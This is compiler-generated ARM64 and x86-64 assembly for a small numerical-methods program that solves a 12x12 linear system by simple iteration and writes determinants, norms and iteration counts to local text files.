LBB13_42: ; in Loop: Header=BB13_41 Depth=2
fmov d0, #2.00000000
adrp x8, lCPI13_0@PAGE
ldr d1, [x8, lCPI13_0@PAGEOFF]
bl _pow
fmov d1, d0
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
add x8, x8, x9, lsl #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB13_43
LBB13_43: ; in Loop: Header=BB13_41 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_41
LBB13_44: ; in Loop: Header=BB13_27 Depth=1
b LBB13_27
LBB13_45:
ldur x0, [x29, #-32]
bl _fclose
stur wzr, [x29, #-116]
b LBB13_46
LBB13_46: ; =>This Loop Header: Depth=1
; Child Loop BB13_48 Depth 2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_53
b LBB13_47
LBB13_47: ; in Loop: Header=BB13_46 Depth=1
stur wzr, [x29, #-120]
b LBB13_48
LBB13_48: ; Parent Loop BB13_46 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_51
b LBB13_49
LBB13_49: ; in Loop: Header=BB13_48 Depth=2
ldur x8, [x29, #-96]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w11, [x29, #-120]
add w9, w9, w11
ldr d0, [x8, w9, sxtw #3]
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB13_50
LBB13_50: ; in Loop: Header=BB13_48 Depth=2
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_48
LBB13_51: ; in Loop: Header=BB13_46 Depth=1
b LBB13_52
LBB13_52: ; in Loop: Header=BB13_46 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_46
LBB13_53:
stur wzr, [x29, #-116]
b LBB13_54
LBB13_54: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_57
b LBB13_55
LBB13_55: ; in Loop: Header=BB13_54 Depth=1
ldur x8, [x29, #-104]
ldursw x9, [x29, #-116]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
str d0, [x8, x9, lsl #3]
b LBB13_56
LBB13_56: ; in Loop: Header=BB13_54 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_54
LBB13_57:
adrp x8, lCPI13_2@PAGE
ldr d0, [x8, lCPI13_2@PAGEOFF]
stur d0, [x29, #-88]
adrp x0, l_.str.10@PAGE
add x0, x0, l_.str.10@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_58
LBB13_58: ; =>This Loop Header: Depth=1
; Child Loop BB13_60 Depth 2
; Child Loop BB13_64 Depth 2
; Child Loop BB13_66 Depth 3
; Child Loop BB13_72 Depth 2
ldur x0, [x29, #-40]
mov w1, #12
bl _GetDet
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_76
b LBB13_59
LBB13_59: ; in Loop: Header=BB13_58 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
str w1, [sp, #96] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldr w2, [sp, #96] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
stur x8, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_60
LBB13_60: ; Parent Loop BB13_58 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #92] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #92] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_63
b LBB13_61
LBB13_61: ; in Loop: Header=BB13_60 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_62
LBB13_62: ; in Loop: Header=BB13_60 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_60
LBB13_63: ; in Loop: Header=BB13_58 Depth=1
ldur x8, [x29, #-32]
str x8, [sp, #80] ; 8-byte Folded Spill
ldur x0, [x29, #-40]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #68] ; 4-byte Folded Spill
bl _MatrixMul
ldr w2, [sp, #68] ; 4-byte Folded Reload
ldur x1, [x29, #-48]
bl _VectSub
ldr w1, [sp, #68] ; 4-byte Folded Reload
bl _FindNorm
ldr w1, [sp, #68] ; 4-byte Folded Reload
str d0, [sp, #72] ; 8-byte Folded Spill
ldur x0, [x29, #-40]
bl _GetDet
ldr d1, [sp, #72] ; 8-byte Folded Reload
ldr x0, [sp, #80] ; 8-byte Folded Reload
mov x8, sp
str d1, [x8]
str d0, [x8, #8]
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
stur wzr, [x29, #-116]
b LBB13_64
LBB13_64: ; Parent Loop BB13_58 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB13_66 Depth 3
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_71
b LBB13_65
LBB13_65: ; in Loop: Header=BB13_64 Depth=2
stur wzr, [x29, #-120]
b LBB13_66
LBB13_66: ; Parent Loop BB13_58 Depth=1
; Parent Loop BB13_64 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_69
b LBB13_67
LBB13_67: ; in Loop: Header=BB13_66 Depth=3
fmov d0, #2.00000000
adrp x8, lCPI13_0@PAGE
ldr d1, [x8, lCPI13_0@PAGEOFF]
bl _pow
fmov d1, d0
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
add x8, x8, w9, sxtw #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB13_68
LBB13_68: ; in Loop: Header=BB13_66 Depth=3
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_66
LBB13_69: ; in Loop: Header=BB13_64 Depth=2
b LBB13_70
LBB13_70: ; in Loop: Header=BB13_64 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_64
LBB13_71: ; in Loop: Header=BB13_58 Depth=1
stur wzr, [x29, #-116]
b LBB13_72
LBB13_72: ; Parent Loop BB13_58 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_75
b LBB13_73
LBB13_73: ; in Loop: Header=BB13_72 Depth=2
fmov d0, #2.00000000
adrp x8, lCPI13_0@PAGE
ldr d1, [x8, lCPI13_0@PAGEOFF]
bl _pow
fmov d1, d0
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
add x8, x8, x9, lsl #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB13_74
LBB13_74: ; in Loop: Header=BB13_72 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_72
LBB13_75: ; in Loop: Header=BB13_58 Depth=1
b LBB13_58
LBB13_76:
ldur x0, [x29, #-32]
bl _fclose
stur wzr, [x29, #-116]
b LBB13_77
LBB13_77: ; =>This Loop Header: Depth=1
; Child Loop BB13_79 Depth 2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_84
b LBB13_78
LBB13_78: ; in Loop: Header=BB13_77 Depth=1
stur wzr, [x29, #-120]
b LBB13_79
LBB13_79: ; Parent Loop BB13_77 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_82
b LBB13_80
LBB13_80: ; in Loop: Header=BB13_79 Depth=2
ldur x8, [x29, #-96]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w11, [x29, #-120]
add w9, w9, w11
ldr d0, [x8, w9, sxtw #3]
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB13_81
LBB13_81: ; in Loop: Header=BB13_79 Depth=2
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_79
LBB13_82: ; in Loop: Header=BB13_77 Depth=1
b LBB13_83
LBB13_83: ; in Loop: Header=BB13_77 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_77
LBB13_84:
stur wzr, [x29, #-116]
b LBB13_85
LBB13_85: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_88
b LBB13_86
LBB13_86: ; in Loop: Header=BB13_85 Depth=1
ldur x8, [x29, #-104]
ldursw x9, [x29, #-116]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
str d0, [x8, x9, lsl #3]
b LBB13_87
LBB13_87: ; in Loop: Header=BB13_85 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_85
LBB13_88:
adrp x8, lCPI13_5@PAGE
ldr d0, [x8, lCPI13_5@PAGEOFF]
stur d0, [x29, #-88]
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_89
LBB13_89: ; =>This Loop Header: Depth=1
; Child Loop BB13_91 Depth 2
ldur d0, [x29, #-88]
adrp x8, lCPI13_4@PAGE
ldr d1, [x8, lCPI13_4@PAGEOFF]
fcmp d0, d1
cset w8, lt
tbnz w8, #0, LBB13_95
b LBB13_90
LBB13_90: ; in Loop: Header=BB13_89 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
str w1, [sp, #64] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldr w2, [sp, #64] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
stur x8, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_91
LBB13_91: ; Parent Loop BB13_89 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #60] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #60] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_94
b LBB13_92
LBB13_92: ; in Loop: Header=BB13_91 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_93
LBB13_93: ; in Loop: Header=BB13_91 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_91
LBB13_94: ; in Loop: Header=BB13_89 Depth=1
ldur x0, [x29, #-32]
ldur w8, [x29, #-116]
; implicit-def: $x9
mov x9, x8
ldur d0, [x29, #-88]
mov x8, sp
str x9, [x8]
str d0, [x8, #8]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
ldur d0, [x29, #-88]
fmov d1, #10.00000000
fdiv d0, d0, d1
stur d0, [x29, #-88]
b LBB13_89
LBB13_95:
ldur x0, [x29, #-32]
bl _fclose
adrp x8, lCPI13_2@PAGE
ldr d0, [x8, lCPI13_2@PAGEOFF]
stur d0, [x29, #-88]
adrp x8, lCPI13_3@PAGE
ldr d0, [x8, lCPI13_3@PAGEOFF]
stur d0, [x29, #-112]
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_96
LBB13_96: ; =>This Loop Header: Depth=1
; Child Loop BB13_98 Depth 2
; Child Loop BB13_102 Depth 2
; Child Loop BB13_106 Depth 2
ldur d0, [x29, #-112]
fmov d1, #1.00000000
fcmp d0, d1
cset w8, lt
tbnz w8, #0, LBB13_110
b LBB13_97
LBB13_97: ; in Loop: Header=BB13_96 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
str w1, [sp, #56] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldr w2, [sp, #56] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
mov x0, #96
bl _malloc
stur x0, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_98
LBB13_98: ; Parent Loop BB13_96 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_101
b LBB13_99
LBB13_99: ; in Loop: Header=BB13_98 Depth=2
ldur x8, [x29, #-80]
ldursw x9, [x29, #-116]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-72]
ldursw x9, [x29, #-116]
str d0, [x8, x9, lsl #3]
b LBB13_100
LBB13_100: ; in Loop: Header=BB13_98 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_98
LBB13_101: ; in Loop: Header=BB13_96 Depth=1
stur wzr, [x29, #-116]
b LBB13_102
LBB13_102: ; Parent Loop BB13_96 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_105
b LBB13_103
LBB13_103: ; in Loop: Header=BB13_102 Depth=2
ldur d1, [x29, #-112]
ldur x8, [x29, #-72]
ldursw x9, [x29, #-116]
add x8, x8, x9, lsl #3
ldr d0, [x8]
fmul d0, d0, d1
str d0, [x8]
b LBB13_104
LBB13_104: ; in Loop: Header=BB13_102 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_102
LBB13_105: ; in Loop: Header=BB13_96 Depth=1
stur wzr, [x29, #-116]
b LBB13_106
LBB13_106: ; Parent Loop BB13_96 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #52] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #52] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_109
b LBB13_107
LBB13_107: ; in Loop: Header=BB13_106 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_108
LBB13_108: ; in Loop: Header=BB13_106 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_106
LBB13_109: ; in Loop: Header=BB13_96 Depth=1
ldur x0, [x29, #-32]
ldur w8, [x29, #-116]
; implicit-def: $x9
mov x9, x8
ldur d0, [x29, #-112]
mov x8, sp
str x9, [x8]
str d0, [x8, #8]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
ldur d0, [x29, #-112]
adrp x8, lCPI13_1@PAGE
ldr d1, [x8, lCPI13_1@PAGEOFF]
fdiv d0, d0, d1
stur d0, [x29, #-112]
b LBB13_96
LBB13_110:
ldur x0, [x29, #-32]
bl _fclose
adrp x8, lCPI13_2@PAGE
ldr d0, [x8, lCPI13_2@PAGEOFF]
stur d0, [x29, #-88]
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
adrp x1, l_.str.6@PAGE
add x1, x1, l_.str.6@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB13_111
LBB13_111: ; =>This Loop Header: Depth=1
; Child Loop BB13_113 Depth 2
; Child Loop BB13_117 Depth 2
; Child Loop BB13_119 Depth 3
; Child Loop BB13_125 Depth 2
ldur x0, [x29, #-40]
mov w1, #12
bl _GetDet
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_129
b LBB13_112
LBB13_112: ; in Loop: Header=BB13_111 Depth=1
ldur x0, [x29, #-40]
mov w1, #12
str w1, [sp, #48] ; 4-byte Folded Spill
bl _CreateAlphaMatrix
ldr w2, [sp, #48] ; 4-byte Folded Reload
stur x0, [x29, #-56]
ldur x0, [x29, #-48]
ldur x1, [x29, #-40]
bl _CreateBetaVector
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
stur x8, [x29, #-72]
stur wzr, [x29, #-116]
b LBB13_113
LBB13_113: ; Parent Loop BB13_111 Depth=1
; => This Inner Loop Header: Depth=2
ldur x0, [x29, #-80]
ldur x1, [x29, #-72]
mov w2, #12
str w2, [sp, #44] ; 4-byte Folded Spill
bl _VectSub
ldr w1, [sp, #44] ; 4-byte Folded Reload
bl _FindNorm
ldur d1, [x29, #-88]
fcmp d0, d1
cset w8, le
tbnz w8, #0, LBB13_116
b LBB13_114
LBB13_114: ; in Loop: Header=BB13_113 Depth=2
ldur x0, [x29, #-64]
ldur x1, [x29, #-56]
ldur x2, [x29, #-72]
mov w3, #12
bl _CreateXVector
stur x0, [x29, #-72]
b LBB13_115
LBB13_115: ; in Loop: Header=BB13_113 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_113
LBB13_116: ; in Loop: Header=BB13_111 Depth=1
ldur x8, [x29, #-32]
str x8, [sp, #32] ; 8-byte Folded Spill
ldur w9, [x29, #-116]
; implicit-def: $x8
mov x8, x9
str x8, [sp, #24] ; 8-byte Folded Spill
ldur x0, [x29, #-40]
mov w1, #12
bl _GetDet
ldr x9, [sp, #24] ; 8-byte Folded Reload
ldr x0, [sp, #32] ; 8-byte Folded Reload
mov x8, sp
str x9, [x8]
str d0, [x8, #8]
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fprintf
ldur x0, [x29, #-56]
bl _free
ldur x0, [x29, #-64]
bl _free
ldur x0, [x29, #-72]
bl _free
stur wzr, [x29, #-116]
b LBB13_117
LBB13_117: ; Parent Loop BB13_111 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB13_119 Depth 3
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_124
b LBB13_118
LBB13_118: ; in Loop: Header=BB13_117 Depth=2
stur wzr, [x29, #-120]
b LBB13_119
LBB13_119: ; Parent Loop BB13_111 Depth=1
; Parent Loop BB13_117 Depth=2
; => This Inner Loop Header: Depth=3
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_122
b LBB13_120
LBB13_120: ; in Loop: Header=BB13_119 Depth=3
fmov d0, #2.00000000
adrp x8, lCPI13_0@PAGE
ldr d1, [x8, lCPI13_0@PAGEOFF]
bl _pow
fmov d1, d0
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
add x8, x8, w9, sxtw #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB13_121
LBB13_121: ; in Loop: Header=BB13_119 Depth=3
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_119
LBB13_122: ; in Loop: Header=BB13_117 Depth=2
b LBB13_123
LBB13_123: ; in Loop: Header=BB13_117 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_117
LBB13_124: ; in Loop: Header=BB13_111 Depth=1
stur wzr, [x29, #-116]
b LBB13_125
LBB13_125: ; Parent Loop BB13_111 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_128
b LBB13_126
LBB13_126: ; in Loop: Header=BB13_125 Depth=2
fmov d0, #2.00000000
adrp x8, lCPI13_0@PAGE
ldr d1, [x8, lCPI13_0@PAGEOFF]
bl _pow
fmov d1, d0
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
add x8, x8, x9, lsl #3
ldr d0, [x8]
fdiv d0, d0, d1
str d0, [x8]
b LBB13_127
LBB13_127: ; in Loop: Header=BB13_125 Depth=2
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_125
LBB13_128: ; in Loop: Header=BB13_111 Depth=1
b LBB13_111
LBB13_129:
ldur x0, [x29, #-32]
bl _fclose
stur wzr, [x29, #-116]
b LBB13_130
LBB13_130: ; =>This Loop Header: Depth=1
; Child Loop BB13_132 Depth 2
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_137
b LBB13_131
LBB13_131: ; in Loop: Header=BB13_130 Depth=1
stur wzr, [x29, #-120]
b LBB13_132
LBB13_132: ; Parent Loop BB13_130 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-120]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_135
b LBB13_133
LBB13_133: ; in Loop: Header=BB13_132 Depth=2
ldur x8, [x29, #-96]
ldur w9, [x29, #-116]
mov w10, #12
mul w9, w9, w10
ldur w11, [x29, #-120]
add w9, w9, w11
ldr d0, [x8, w9, sxtw #3]
ldur x8, [x29, #-40]
ldur w9, [x29, #-116]
mul w9, w9, w10
ldur w10, [x29, #-120]
add w9, w9, w10
str d0, [x8, w9, sxtw #3]
b LBB13_134
LBB13_134: ; in Loop: Header=BB13_132 Depth=2
ldur w8, [x29, #-120]
add w8, w8, #1
stur w8, [x29, #-120]
b LBB13_132
LBB13_135: ; in Loop: Header=BB13_130 Depth=1
b LBB13_136
LBB13_136: ; in Loop: Header=BB13_130 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_130
LBB13_137:
stur wzr, [x29, #-116]
b LBB13_138
LBB13_138: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-116]
subs w8, w8, #12
cset w8, ge
tbnz w8, #0, LBB13_141
b LBB13_139
LBB13_139: ; in Loop: Header=BB13_138 Depth=1
ldur x8, [x29, #-104]
ldursw x9, [x29, #-116]
ldr d0, [x8, x9, lsl #3]
ldur x8, [x29, #-48]
ldursw x9, [x29, #-116]
str d0, [x8, x9, lsl #3]
b LBB13_140
LBB13_140: ; in Loop: Header=BB13_138 Depth=1
ldur w8, [x29, #-116]
add w8, w8, #1
stur w8, [x29, #-116]
b LBB13_138
LBB13_141:
mov w0, #0
ldp x29, x30, [sp, #304] ; 16-byte Folded Reload
ldp x28, x27, [sp, #288] ; 16-byte Folded Reload
add sp, sp, #320
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%lf\n"
.section __TEXT,__const
l_.str.1: ; @.str.1
.space 2
.section __TEXT,__cstring,cstring_literals
l_.str.2: ; @.str.2
.asciz "%lf"
l_.str.3: ; @.str.3
.asciz "%lf "
l_.str.4: ; @.str.4
.asciz "\n"
l_.str.5: ; @.str.5
.asciz "../Dependings1.txt"
l_.str.6: ; @.str.6
.asciz "w"
l_.str.7: ; @.str.7
.asciz "%.15lf %.15lf\n"
l_.str.8: ; @.str.8
.asciz "../Dependings2.txt"
l_.str.9: ; @.str.9
.asciz "../Dependings3.txt"
l_.str.10: ; @.str.10
.asciz "../Dependings4.txt"
l_.str.11: ; @.str.11
.asciz "../Dependings5.txt"
l_.str.12: ; @.str.12
.asciz "%i %.15lf\n"
l_.str.13: ; @.str.13
.asciz "../Dependings6.txt"
l_.str.14: ; @.str.14
.asciz "../Dependings7.txt"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function GetDet
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _GetDet
.p2align 4, 0x90
_GetDet: ## @GetDet
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
xorps %xmm0, %xmm0
movsd %xmm0, -40(%rbp)
cmpl $2, -20(%rbp)
jne LBB0_2
## %bb.1:
movq -16(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
movq -16(%rbp), %rax
movsd 24(%rax), %xmm2 ## xmm2 = mem[0],zero
movq -16(%rbp), %rax
movsd 8(%rax), %xmm1 ## xmm1 = mem[0],zero
movq -16(%rbp), %rax
mulsd 16(%rax), %xmm1
movq %xmm1, %rax
movabsq $-9223372036854775808, %rcx ## imm = 0x8000000000000000
xorq %rcx, %rax
movq %rax, %xmm1
mulsd %xmm2, %xmm0
addsd %xmm1, %xmm0
movsd %xmm0, -8(%rbp)
jmp LBB0_25
LBB0_2:
movl $0, -24(%rbp)
LBB0_3: ## =>This Loop Header: Depth=1
## Child Loop BB0_5 Depth 2
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_13
## %bb.4: ## in Loop: Header=BB0_3 Depth=1
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -48(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
movl $0, -28(%rbp)
LBB0_5: ## Parent Loop BB0_3 Depth=1
## => This Inner Loop Header: Depth=2
movl -28(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_11
## %bb.6: ## in Loop: Header=BB0_5 Depth=2
movq -16(%rbp), %rax
movl -28(%rbp), %ecx
imull -20(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
mulsd -48(%rbp), %xmm0
movsd %xmm0, -48(%rbp)
movl -32(%rbp), %eax
movl -20(%rbp), %ecx
subl $1, %ecx
cmpl %ecx, %eax
jne LBB0_8
## %bb.7: ## in Loop: Header=BB0_5 Depth=2
xorl %eax, %eax
movl %eax, -52(%rbp) ## 4-byte Spill
jmp LBB0_9
LBB0_8: ## in Loop: Header=BB0_5 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp) ## 4-byte Spill
LBB0_9: ## in Loop: Header=BB0_5 Depth=2
movl -52(%rbp), %eax ## 4-byte Reload
movl %eax, -32(%rbp)
## %bb.10: ## in Loop: Header=BB0_5 Depth=2
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB0_5
LBB0_11: ## in Loop: Header=BB0_3 Depth=1
movsd -48(%rbp), %xmm0 ## xmm0 = mem[0],zero
addsd -40(%rbp), %xmm0
movsd %xmm0, -40(%rbp)
## %bb.12: ## in Loop: Header=BB0_3 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_3
LBB0_13:
movl $0, -24(%rbp)
LBB0_14: ## =>This Loop Header: Depth=1
## Child Loop BB0_16 Depth 2
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_24
## %bb.15: ## in Loop: Header=BB0_14 Depth=1
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -48(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
movl $0, -28(%rbp)
LBB0_16: ## Parent Loop BB0_14 Depth=1
## => This Inner Loop Header: Depth=2
movl -28(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB0_22
## %bb.17: ## in Loop: Header=BB0_16 Depth=2
movq -16(%rbp), %rax
movl -28(%rbp), %ecx
imull -20(%rbp), %ecx
addl -32(%rbp), %ecx
movslq %ecx, %rcx
movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero
mulsd -48(%rbp), %xmm0
movsd %xmm0, -48(%rbp)
cmpl $0, -32(%rbp)
jne LBB0_19
## %bb.18: ## in Loop: Header=BB0_16 Depth=2
movl -20(%rbp), %eax
subl $1, %eax
movl %eax, -56(%rbp) ## 4-byte Spill
jmp LBB0_20
LBB0_19: ## in Loop: Header=BB0_16 Depth=2
movl -32(%rbp), %eax
subl $1, %eax
